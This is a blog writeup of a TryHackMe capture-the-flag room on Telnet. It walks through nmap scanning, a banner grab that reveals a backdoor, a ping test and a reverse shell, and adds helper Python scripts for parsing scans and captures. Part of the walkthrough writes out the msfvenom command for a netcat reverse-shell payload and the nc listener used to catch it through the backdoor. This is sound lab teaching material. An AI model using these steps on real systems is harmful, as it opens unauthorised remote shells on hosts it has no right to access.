Network Services (Telnet) — Tryhackme

Richard Roy
Feb 24, 2022 · 4 min read

This is a writeup for the Network Services room on TryHackMe (THM).

Enumerating Telnet

Spin up your target machine and let’s do a quick nmap scan to see what ports are open. -Pn skips host discovery (the host is treated as up) and -p- scans all 65535 TCP ports instead of nmap’s default list.

# nmap -Pn -p- 10.10.37.92
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 09:10 EST
Nmap scan report for 10.10.37.92
Host is up (0.42s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE
8012/tcp open  unknown

1. How many ports are open on the target machine?

1

2. What port is this?

8012

3. This port is unassigned, but still lists the protocol it’s using, what protocol is this?

TCP

Rerunning the nmap scan without -p-, so only nmap’s default set of the 1000 most common ports is scanned:

sudo nmap -Pn 10.10.37.92
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 09:10 EST
Nmap scan report for 10.10.37.92
Host is up (0.42s latency).
All 1000 scanned ports on 10.10.37.92 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds

4. Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

0
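As an added example (my own code, not part of the room or of nmap), here is a small Python parser for nmap’s normal output that lists the open ports and works out how many ports were actually scanned. The two captures are constructed to match the scans above, and they make the point of question 4 concrete: the default scan covers only 1000 ports and never touches 8012, which is why an exposure audit of your own hosts should use -p-.

```python
"""Parse nmap's normal (human-readable) output and list open ports.

Added example for this writeup; not part of the TryHackMe room or of nmap.
The two captures below are constructed to mirror the scans shown above.
"""
import re

# One line per port in nmap's normal output, e.g. "8012/tcp open unknown".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", re.M)

# "Not shown: 65534 closed tcp ports (reset)" is nmap's count of ports it
# scanned but did not list individually.
NOT_SHOWN = re.compile(r"^Not shown: (\d+) ", re.M)


def parse_nmap(output: str) -> dict:
    """Return the open ports plus the total number of ports nmap scanned."""
    ports = [
        {"port": int(p), "proto": proto, "state": state, "service": svc}
        for p, proto, state, svc in PORT_LINE.findall(output)
    ]
    open_ports = [p for p in ports if p["state"] == "open"]
    m = NOT_SHOWN.search(output)
    not_shown = int(m.group(1)) if m else 0
    return {
        "open": open_ports,
        "scanned": len(ports) + not_shown,  # listed lines + the summarised ones
    }


# Constructed captures, matching the full-range and default scans in the writeup.
FULL_SCAN = """\
Nmap scan report for 10.10.37.92
Host is up (0.42s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE
8012/tcp open  unknown
"""

DEFAULT_SCAN = """\
Nmap scan report for 10.10.37.92
Host is up (0.42s latency).
All 1000 scanned ports on 10.10.37.92 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
"""

if __name__ == "__main__":
    for name, capture in (("-p- scan", FULL_SCAN), ("default scan", DEFAULT_SCAN)):
        result = parse_nmap(capture)
        print(f"{name}: {result['scanned']} ports scanned, "
              f"{len(result['open'])} open -> {[p['port'] for p in result['open']]}")
```

Feed it the saved output of a scan (nmap -oN) and it reports the same answers as questions 1 and 4: one open port (8012) out of 65535 for the full scan, none out of 1000 for the default one.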

Telnet Banner Grabbing

If we connect to the IP and port with telnet, the service prints its banner:

sudo telnet 10.10.37.92 8012
[sudo] password for kali:
Trying 10.10.37.92...
Connected to 10.10.37.92.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands

5. Based on the title returned to us, what do we think this port could be used for?

a backdoor

6. Who could it belong to? Gathering possible usernames is an important step in enumeration.

skidy
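The telnet step above is just a banner grab: connect, send nothing, and read what the service volunteers. As an added example (my own code, not the room’s), here is the same check in Python. It starts a throwaway local server with a constructed banner so it runs offline; point grab_banner() at a host and port you own to audit what a service announces to anyone who connects, and to confirm that services which should stay quiet return an empty banner.

```python
"""Read the banner a TCP service sends on connect, without sending anything.

Added example for this writeup (not the room's code). serve_once() is a
throwaway local server used only so the demo runs offline.
"""
import socket
import threading


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """Connect, wait up to `timeout` seconds for the server to speak first,
    and return whatever it sent. Returns "" if the service stays silent or
    refuses the connection."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            chunks = []
            try:
                while True:
                    data = sock.recv(1024)
                    if not data:  # server closed the connection
                        break
                    chunks.append(data)
            except socket.timeout:
                pass  # server went quiet; keep what it sent so far
            return b"".join(chunks).decode("utf-8", errors="replace").strip()
    except OSError:
        return ""


def serve_once(banner: bytes) -> int:
    """Start a one-shot local server that greets the first client with
    `banner` and then closes. Returns the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    srv.listen(1)

    def handler():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=handler, daemon=True).start()
    return srv.getsockname()[1]


# Constructed banner for the demo, in the style of a self-announcing service.
DEMO_BANNER = b"DEMO SERVICE v1.0 ready\r\n"

if __name__ == "__main__":
    port = serve_once(DEMO_BANNER)
    print(f"banner on 127.0.0.1:{port}: {grab_banner('127.0.0.1', port)!r}")
```

A service that identifies itself on connect, as the one on 8012 does, hands an attacker the username and purpose for free; the empty-string result is the one you want to see on anything you expose.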

Exploiting Telnet

Read the room notes from task 7 👀

2. Great! It’s an open telnet connection! What welcome message do we receive?

SKIDY'S BACKDOOR.

3. Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

N

Start a tcpdump listener on your local machine.

If using your own machine with the OpenVPN connection, use:

  • sudo tcpdump ip proto \\icmp -i tun0

If using the AttackBox, use:

  • sudo tcpdump ip proto \\icmp -i eth0

This starts a tcpdump listener that captures only ICMP traffic, which is the protocol ping uses.

[Screenshot: tcpdump output]

4. Now, use the command “ping [local THM ip] -c 1” through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note that you need to prefix the command with .RUN. (Y/N)

Y
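Reading the tcpdump window by eye works for one ping, but it helps to know exactly what you are looking for in the capture. As an added example (my own code, not part of the room), this Python snippet parses tcpdump’s text output and returns only the ICMP echo requests sent by a given host. The capture lines are constructed in the shape tcpdump prints for the filter above; the listener address 10.9.1.5 is a placeholder for your tun0 IP.

```python
"""Spot ICMP echo requests from a given host in tcpdump's text output.

Added example for this writeup, not part of the room. The capture lines are
constructed in the shape tcpdump prints (timestamp, "IP src > dst:", then the
ICMP type). It answers the same question as watching the terminal: did the
target actually send us a ping?
"""
import re

ICMP_LINE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): "
    r"ICMP echo (?P<kind>request|reply), id (?P<id>\d+), seq (?P<seq>\d+)"
)


def echo_requests_from(lines, source_ip):
    """Return (timestamp, destination, seq) for every echo request `source_ip` sent."""
    hits = []
    for line in lines:
        m = ICMP_LINE.match(line)
        if m and m["kind"] == "request" and m["src"] == source_ip:
            hits.append((m["ts"], m["dst"], int(m["seq"])))
    return hits


# Constructed capture: 10.9.1.5 stands in for our tun0 address, the target is
# 10.10.37.92 as in the writeup. The first pair is unrelated ping traffic.
CAPTURE = """\
09:14:01.000123 IP 10.9.1.5 > 10.9.0.1: ICMP echo request, id 7, seq 1, length 64
09:14:01.120456 IP 10.9.0.1 > 10.9.1.5: ICMP echo reply, id 7, seq 1, length 64
09:14:02.334567 IP 10.10.37.92 > 10.9.1.5: ICMP echo request, id 1, seq 1, length 64
09:14:02.334890 IP 10.9.1.5 > 10.10.37.92: ICMP echo reply, id 1, seq 1, length 64
""".splitlines()

if __name__ == "__main__":
    for ts, dst, seq in echo_requests_from(CAPTURE, "10.10.37.92"):
        print(f"{ts}: echo request from target to {dst} (seq {seq})")
```

Pipe a real capture through it with tcpdump -l ... | python3 script.py (reading sys.stdin instead of CAPTURE) and a non-empty result is your “Y” for question 4; filtering on the source address keeps your own outbound pings from producing a false positive.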

We’re going to generate a reverse shell payload using msfvenom. This will generate and encode a netcat reverse shell for us. Here’s our syntax:

“msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R”

-p = payload

lhost = our local host IP address (this is your machine’s IP address)

lport = the port to listen on (this is the port on your machine)

R = export the payload in raw format


5. What word does the generated payload start with?

mkfifo

6. Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

“nc -lvp [listening port]”

What would the command look like for the listening port we selected in our payload?

nc -lvp 4444

Now paste the payload generated by msfvenom into the telnet session, prefixed with .RUN:

.RUN <payload>

The netcat listener will catch a reverse shell.

Run cat flag.txt in that shell to answer the last question.

Thank you for reading.

🐾 Writeup on Network Services FTP here: https://richardphilipsroy.medium.com/network-services-ftp-tryhackme-6c22406d1444
